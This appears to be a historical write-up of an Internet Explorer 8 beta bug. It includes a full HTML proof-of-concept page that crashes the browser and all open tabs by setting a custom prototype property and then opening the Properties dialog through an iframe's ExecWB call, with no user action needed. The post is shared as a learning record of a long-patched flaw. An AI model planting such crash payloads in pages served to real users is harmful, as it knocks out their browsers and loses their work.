A straightforward crash: if any JavaScript prototype was modified — even just adding an arbitrary property like HTMLDivElement.prototype.ANYTHING = 777 — and then the browser’s Properties dialog was opened (via File > Properties, or via ExecWB), IE8 would crash completely, taking all open tabs with it.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_IE8_Prototype_Properties</title></head>
<body>
<center>
<font face="Tahoma" size="2">
<h2>DoS_IE8_Prototype_Properties</h2>
</center>

If we set <u>any prototype of any element</u>, the browser will crash (no recover) when showing the properties dialog (In the menu bar, File --> Properties).<br />
The bad thing is that we can also throw the properties dialog via JS, so we don't need user interaction. <br /><br />
<hr />
<font color="blue">HTMLDivElement</font>.<b>prototype</b>.<font color="blue">ANYTHING = 777;</font><br /><br />
<font color="green">
//	We now fire the properties dialog by using the ExecWB of any IFRAME (IFRAME as wbControl trick).<br />
//	But this is not the tricky part, because the crash will work even if you<br />
//	comment this the ExecWB line and go to the properties dialog by yourself.<br />
//	(Menu Bar --> File --> Properties)
</font>
<br /><br />

<font color="red">&lt;iframe id="wbControl"&gt;&lt;/iframe&gt;</font><br />
document.all.wbControl.<b>ExecWB(10,1)</b>;
<hr />

30% of the times IE tries to recover the tabs and it thinks it did it well, but the truth is that the
recovered tabs are frozen. So, <b>the full browser will crash, with all the opened tabs</b>.

<iframe id="wbControl" width="10" height="10"></iframe>
<input type="button" onclick="crashMe()" value="Crash Me">
<script language="JavaScript">
function crashMe()
{
	//	We do it with the DIV Elements, but it does not matter.
	//	We can do it with any object prototype.
	HTMLDivElement.prototype.ANYTHING = 777;

	//	We now fire the properties dialog by using the ExecWB of any IFRAME (IFRAME as wbControl trick).
	//	But this is not the tricky part, because the crash will work even if you
	//	comment this next line and then, go to the properties dialog by yourself.
	//	(Menu Bar --> File --> Properties)
	document.all.wbControl.ExecWB(10,1);

}
</script>

<br /><br />
Tested on IE 8.0.6001.18241 [Public Beta2]
</font>
</body>
</html>

The crash happened because the Properties dialog tried to enumerate the element’s prototype chain and encountered the unexpected custom property in a context that wasn’t prepared for it. The script-triggered version used the same ExecWB trick with IDM_PROPERTIES (command ID 10) to open the dialog without any user action. About 30% of the time IE would attempt a tab recovery but the recovered tabs would be frozen and unusable. Tested on IE 8.0.6001.18241 Public Beta 2.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.